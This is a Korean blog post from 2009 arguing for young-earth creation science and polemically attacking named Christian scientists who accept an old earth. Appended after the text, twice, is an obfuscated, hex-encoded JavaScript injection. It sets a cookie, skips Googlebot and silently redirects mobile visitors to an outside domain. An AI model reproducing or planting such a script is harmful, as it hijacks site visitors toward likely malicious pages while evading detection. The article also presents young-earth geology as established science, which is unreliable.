기독교인 과학자의 타협

Categories: 최우성

Tuesday, 3 March 2009

people

기독교인 과학자의 타협
다윈 탄생 200주년에 즈음하여

“너는 그들에게 ‘주 하나님께서 이와 같이 말씀하신다’ 하고 말하여라. 그들은 반항하는 족속이다. 듣든지 말든지, 자기들 가운데 예언자가 있다는 것만은 알게 될 것이다. … 그들이 듣든지 말든지 오직 너는 그들에게 나의 말을 전하여라.” 에스겔 2장 4-7절의 말씀은 마치 현재 진화론 시대에 살고 있는 기독교계에 있는 학자들 특히 과학자들에게 사실을 말하라는 명령처럼 들려 온다. 진화론을 발표하여 세상을 혼미 속으로 몰아넣고 있는 다윈의 출생 200 년(2009년 2월 12일)과 진화론을 집대성한 ‘종의 기원’ 출판(1859년 11월 24일) 150 년을 맞아 세상이 떠들썩 하다.
한국 교계에서도 진화론의 영향을 받아 신앙 문제에 심각한 빌미를 제공하는 부분이 있다. 진화론과 수십억 년 지구나이를 바탕으로 한 다중격변론을 주장하는 양승훈 교수의 예를 중심으로 그 문제점들을 지적하고 올바른 기초를 제시하고자 한다. 다중격변론을 간단히 말하자면 하나님께서 진화 순서대로 창조하시고 멸종시키는 일을 반복적으로 하셨는데, 그 멸종이 일어날 때마다 지구상에 노아홍수와 같은 격변이 있었다는 이론이다. 그리고 그 격변의 원인은 지구 밖에서 날라온 운석이며 최후의 격변이 노아홍수라는 성경과 진화론적 순서와의 타협이론이다. 다중격 변론은 전공자에게서 나온 것이 아니며 과학과 성경 모두에서 심각한 많은 문제점을 안고 있다. 그러나 여기서는 보다 근본적인 문제를 지적하고자 한다.
양승훈 교수의 블로그에 있는 최근 칼럼(번호 1380) “두 근본주의의 충돌”에서 양교수는 창조과학자를 일컬어 성경을 문자적으로 믿어 지구는 약 6 천년 되었으며, 1년간의 노아홍수가 모든 지층을 만들었다고 믿을 뿐 아니라, 전문적 깊이가 없어 때로는 증명된 과학적 사실들도 부정하는 편협한 사람들로 표현 하였다. 그러나 그의 주장은 다시 서술돼야 한다. 창조과학자란 젊은 지구와 노아홍수를 맹목적으로 믿는 사람들이 아니라 성경을 ‘성경대로 믿는 기독교인 과학자들(Bible Believing Christian Scientists)’이다. 그렇기 때문에 젊은 지구와 노아홍수를 믿는 것이다.
창조과학자들은 지구의 자전, 태양계, 은하계, 열역학법칙들, 기체의 행동 법칙들, 전기-자기의 법칙들, 유전 법칙들, 만유인력의 법칙, 상대성 이론 등을 받아드린다. 뿐만 아니라 이런 물리학, 생물학 등 여기에 열거하지 않은 수많은 과학 법칙들의 거의 전부는 성경을 성경대로 믿었던 코페르니쿠스, 케플러, 뉴턴, 보일, 켈빈, 패러데이, 멘델, 파스퇴르, 맥스웰 같은, 양교수가 소위 창조과학자들이라고 부르는 사람들, 다시 말해 ‘성경을 기록된 대로 믿었던 사람들(Bible Believing Christians)’에 의해서 발견된 것들이었다.
양승훈 교수가 창조과학자들을 자연과학의 법칙들도 무시하는 비전문가들이라고 주장하는 것은 거짓말이다. 현재 살아있는 창조과학자들 중에도 노벨상을 받았던 사람들과 공동 연구 과제들을 수행했던 듀안 기쉬 박사나, 판구조론 컴퓨터 모델링으로 Science나 Nature에 최고의 논문을 실었던 지질학자인 Baumgardner 박사 같은 사람들이 자타가 공인하는 창조과학자들임에도 불구하고 창조과학자들 중에 전문가가 없다고 주장하는 것은 잘못된 것이다. 이 외에도 멘델처럼 당시에 훌륭한 연구 업적을 냈지만 세상이 아직 알아주지 못해 묻혀 있는 진주와 같은 창조과학자들이 많이 있다. 양교수는 이들을 그렇게 세상 기준으로 폄하하여 표현하고 있는 것이다.
우리는 천동설 시대에 살았던 사람들에게서 교훈을 얻어야 한다. 당시에도 가장 유능하고 가장 명석한 사람들 모두 다 지구가 돈다는 사실을 볼 수 없었다는 사실이다. 그러나 ‘지구가 돈다는 사실’은 모든 사람들이 지구가 돌지 않는다고 해도 변할 수 없는 것이다. 또한 지나간 역사는 하나님도 바꿀 리 없다.
창조과학자들이 세상 과학자들과 아주 다른 주장을 하는 부분이 있다. 창조과학자들은 자연과학의 범위를 벗어난 과거의 역사를 설명하는 데 있어 성경의 역사와 다른 설명은 틀렸다고 단호하게 말한다. 대표적인 부분이 창세기 1장 ~11장의 역사로서 특별히 세상 과학자들이 사실이 아니라고 주장하는 6일간의 창조와 전 지구적인 파괴를 야기한 노아홍수는 아주 중요한 의미를 갖고 있다. 하나님 외에는 아무도 보지 않은 6일간의 우주 창조는 믿음의 결정판이고 노아홍수는 하나님께서 성경대로 행하신 전지구적인 증거들에 대한 가장 적절한 설명을 제공하기 때문이다.
노아홍수의 바른 이해가 없으면 캄브리아기의 화석 대폭발, 넓은 고생대 지층에 비해 아주 협소한 중생대와 신생대 지층 규모, 지층과 지층 사이의 시간 간격 없음, 지층의 역전 현상, 화석 순서의 뒤바뀜, 빙하기나 공룡에 대한 설명, 인종, 언어, 현재 지형 등 이 세상을 이해할 수가 없는 것이다.
물론 증거들을 잘 설명할 수 없기 때문에 어떤 이론이 사실이 아니라고 주장하는 것은 옳지 않다. 그러나 성경적인 세계관으로 보면 그런 증거들이 훨씬 더 쉽게 이해된다. 또한 성경을 벗어나서는 이들 증거들에 대한 해석에 더 많은 불확실한 가정들이 필요하다. 그렇지만 성경은 사실을 말했기 때문에 성경의 주장을 사실로 믿고 보면, 어느 모로 보아도 타당한 설명을 주고 있다.
성경의 역사적 기록들은 사실이든지, 거짓이든지 둘 중 하나이지 명석한 사람들에 의해서 결정될 일이 아님을 알아야 한다. 창조과학자들은 처음부터 항상 계셨던 그 분의 증언을 믿는 것이고 그 증언이 논리적이고, 과학적이고, 증거적임을 계속해서 경험하고 있다. 창조과학자들은 성경의 기록을 믿고 그 사실이 기적으로 이루어 졌는지, 물리적인 과정을 통해 이루어 졌는지, 그렇다면 그 과정은 어떤 과정이었는지 그 증거가 남아 있는지, 하나님의 디자인은 얼마나 놀라운 것인지 등을 연구하여 하나님의 말씀이 성경대로 사실이며 피조물에 보이는 창조자의 능력과 속성을 보여 주어 성경의 하나님이 창조주 하나님인 것을 드러내 그 분께 영광을 돌리고 하나님 아는 것을 대적하는 모든 이론을 파하고 그 분 앞에 무릎 꿇도록 하는 일을 하고 있다.

기독교인이라고 하면서 성경을 그대로 믿지 않는 과학자들의 믿음을 살펴 보자. 최근 한국의 교계에서 가장 문제를 많이 일으키고 있는 양승훈 교수나 시카고 코스타(KOSTA, Wheaton College)에서 과학에 대한 강의를 했던 우종학 박사 그리고 해외에서는 점진적창조론과 진화론 사이에 있는 천문학 박사인 휴 로스 등이 성경을 기록된 대로 믿지 않는 과학자들의 대표적 예이다.
(1) 이들은 성경이 암시조차도 하고 있지 않는 45억년의 오랜 지구/ 150억 년의 오랜 우주(빅뱅)를 믿는다. 많은 유명한 과학자들이 그렇다고 하기 때문이라고 한다.
(2) 이들은 성경에서 말하지 않을 뿐 아니라 진화가 사실일 경우에만 성립할 수 있는 고생대-중생대-신생대로 이어지는 약 6억년의 지구 생물 역사를 믿는다. 역시 세상의 대다수의 전문가들이 그렇다고 주장하기 때문이라고 한다. 이처럼 그들은, 다 아는 것이 하나도 없는 사람들의 확신할 수 없고 결점이 많은 결론을 믿기 때문에 하나님의 증언인 창세기 1장을 사실대로 받아드리지 않는다. 그러나 그들은 이상하게도 다른 분야에서는 또 다른 종류의 믿음을 보임으로써 그들이 가진 믿음이 일관성 없음을 보여주고 있다.
(3) 이들은 진화는 사실이 아니라고(양승훈 교수: 진화론 없이는 성립하지 않는 고생대-중생대-신생대를 사실로 믿으면서 진화론을 거부하는 것은 이율 배반적인 믿음이다.) 믿기도 하고, 상관 없다(우종학 박사/ 휴 로스)고 믿기도 한다. 세상 대부분의 생물학자와 고생물학자들이 진화가 사실이라고 주장 함에도 불구하고……
(4) 이들은 하나님이 존재한다고 믿는다. 세상의 대부분의 과학자들은 하나님이 없다고 주장 함에도 불구하고……
(5) 이들은 또한 예수 그리스도는 동정녀에게서 태어나셨다고 믿는다. 세속 생물학자들이 절대로 그럴 수 없다고 주장하고 있음에도 불구하고…….
(6) 이들은 예수 그리스도가 죽은 지 3일만에 다시 살아 나셨다고 믿는다. 이 세상의 과학은 죽은 사람이 다시 살아 날 수 없다고 주장함에도 불구하고…….
(7) 이들은 천국과 지옥도 믿는다. 이 세상 대부분의 전문가와 유명 인사들이 천국과 지옥은 과학적으로 증명할 수 없다고 말하고 있음에도 불구하고 말이다

이런 믿음의 행태를 분석해 보면 이 과학자들의 믿음이 어떤 것인지 확연하게 알 수 있다. 이들은 성경을 믿는 것이 아니라 자기 자신의 생각을 믿고 있다. 하나님의 존재도, 천국의 존재도, 예수 그리스도의 동정녀 탄생도, 부활도, 각종 기적들도 자신의 필요에 의해 믿고 있는 것처럼 보인다. 이런 사상을 지식인들은 유신론적 실존주의 철학이라 부른다.
그들은 소위 말하는 과학 즉 자연과학이 아닌 과학을 거부함으로써 세상에서 받게 될 비난을 피하며 과학자로서의 세상 영광도 취하고 신앙인으로서도 대우 받기위해 그런 것들을 사실로 믿는다
고 말하거나 자신의 마음의 평안을 위해 그런 믿음이 필요한 것이다. 이런 믿음은 성경적인 믿음이 아니다. 근본적으로 말하자면, 그들은 성경을 믿는 것이 아니다.
이 과학자들은 성경이 과학책이 아니라고 말한다. 그래서 성경은 과학적으로 정확하지 않다고 말한다. 그러나 이런 생각은 분명 잘못된 것이다. 성경은 과학책이 아니기 때문에 잘못된 것을 매년 바로잡아야 하는 과학책과는 달리 바로 잡을 필요가 전혀 없는 변하지 않는 진리라는 사실을 알아야 한다. 성경은 사실이기 때문이다. 성경은 과학책이 아님이 분명하다. 그러나 역사적인 사실 기록이기 때문에 과학적인 면에서도 전혀 하자가 있을 수 없다.
이들의 생각에 독자의 마음이 동조되었다면 잠잠히 자기 자신을 돌아 보아야 한다. 더욱이 단순히 안 믿어진다는 것과 성경말씀이 사실이 아니라고 해석해 버리는 것은 전혀 다른 이야기다. 하나님의 말씀이 사실이 아니라고, 하나님이 무능하다고, 혹은 거짓말 하셨다고 말하는 것이기 때문이다. 그것은 마치 모든 것을 다 아시고 모든 능력이 있으신 하나님이 우리에게 150억년, 46억년, 혹은 6억년이라고 표현할 방법을 몰라 6일이라고 얼버무렸다고 혹은 거짓말 했다고 말하는 것과 같다. 물론 창조과학자들도 성경의 모든 부분을 문자 그대로 믿는 것이 아니다. 성경에는 역사도 있고, 시도 있고, 사실 기술도 있고, 비유도 있어 문맥을 이해하고 읽어야 할 경우도 있음을 인정한다. 그러나 과연 과거 역사에 대하여 하나님께서 계시하신 말씀 그대로 이해하지 않는다면 그밖에 어떤 다른 해석이 있을까? 창세기 1장을 자기 지식에 맞추어 해석해서 읽는다면 나머지 49 장과 다른
65 권의 성경은 어떻게 읽게 될 것인가?
더 큰 문제는 이들 개인의 믿음은 자신들에게서 그치지 않는다는 것이다. 이들의 주장에서 파급된 영향력 즉 성경에 대한 불신은 어떤 말로도 정당화 될 수 없다. 서양 역사가 증명해 주고 있고 성경 사상을 기반으로 건국 되었던 오늘의 미국 세태가 확실하게 그 불신의 결과를 보여 주고 있다.
성경에서 벗어난 사상은 개인 구원을 어렵게 하고 언제나 문화의 타락으로 이어지고 있다. 이런 엄청난 죄의 물꼬를 그들이 터 주고 있다는 것을 명심해야 한다.
자신이 기독교인 이라는 이 과학자들은 성경에서 말하는 역사가 아닌 다른 역사를 주장하려면 얼마든지 세상 학계에 나가서 자기가 연구한 과학 이론을 발표할 수 있다. (물론 그것은 진리가 아니기 때문에 의미 없는 일이기는 하지만 세상 지식을 통해 실망에 실망을 거듭한 끝에 돌고 돌아 사실을 발견할 가능성도 있다) 하지만 만약 그들이 결국에 ‘사실’을 발견한다면 그것은 성경에서 이미 말해 놓은 것을 확인하게 되는 것일 뿐이다. 또 십 수년 전에 쓴 책이나 최근에 쓴 양교수의 글을 읽을 때마다 느끼는 소감은 그가 확신하고 있는 것이 별로 없다는 사실이다. 따라서 그는 (좋게 말해서) 항상 중립적인 위치에 서 있다. 이것도 일리가 있고 저것도 일리가 있다고 말한다. 진화론도 아니고 그렇다고 성경적 창조도 아니다, 하나님 편도 아니고 세상편도 아니다. 그에게는 확실한 것이 없고 늘 애매 모호하다. 그의 글의 또 다른 특징은 자기가 하나님도 판단하고 세상도 판단한다. 이것은 첫 사람 아담이 선과 악을 스스로 판단 하고자 했던 우리의 원죄와 정확하게 일치하고 있다고 생각한다. 성경은 ‘너는 배우고 확신한 일에 거하라’고 명령하고 있고 누구에게서 배웠는지가 중요하다고 말한다(딤후 3:14). 예수님은 아버지 하나님과 세상 아비 두 선생이 있다고 말씀 하셨다(요8:38). 그러므로 확실한 것도 아닌 세상의 것을 교회에 들고 들어와 하나님께서 계시하신 말씀의 권위를 해치는 일을 하고 있는 양교수를 비롯한 이와 비슷한 자세를 취하는 과학자들은 정신을 차려야 한다. 무서운 사실이 있기 때문이다. 증명되지도 않고, 자기도 확신하지 못하는 생각을 가지고 많은 크리스천들에게 암암리에 성경의 권위를 떨어뜨리게 하는 행위를 중단 해야 한다. 무서운
사실이 있기 때문이다. 사실이란 무엇인가? 사실이란 내가 알든지 모르든지 상관이 없고, 좋아하든지 싫어하든 상관이 없고, 믿든지 안 믿든지 상관 없이 참으로 존재하는 것이다. 성경에 기록 된 하나님의 말씀은 사실이기 때문에 이것을 믿지 않는 사람들에게 사실은 무서운 것이다. 창조자 예수를 그리스도로 믿지않는 자들에게는 지옥이 기다리고 있고, 성경에 기록된 하나님 말씀을 더하거나 빼는 사람들에게는 재앙이 더해지고 생명나무와 거룩한 성에 참여하지 못하게 되고, 소경이 소경을 인도하듯 다른 사람들을 실족케 하는 사람들은 차라리 연자 맷돌을 목에 걸고 물에 빠지는 편이 낫고, 죄인은 하나님 계신 곳에 설 수 없기 때문이다(마 18:6). “너는 그 말씀에 더하지 말라. 그가 너를 책망하시겠고, 너는 거짓말 하는 자가 될까 두려우니라”(잠 30:6). 이것은 어떤 특정인을 향한 독설이 아니라 하나님 말씀이다. 하나님 말씀을 대적하는 결과는 무섭다. 그 무서운 사실 속에 들어가는 사람이한 사람도 없기를 바라 마지않는다. 그러나 모든 기독교인들이 은혜의 사실 속에 들어가는 행복과 기쁨의 감격누리기를 바란다.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}



people1.jpg (34 kB)

people
people-2.jpg (139 kB)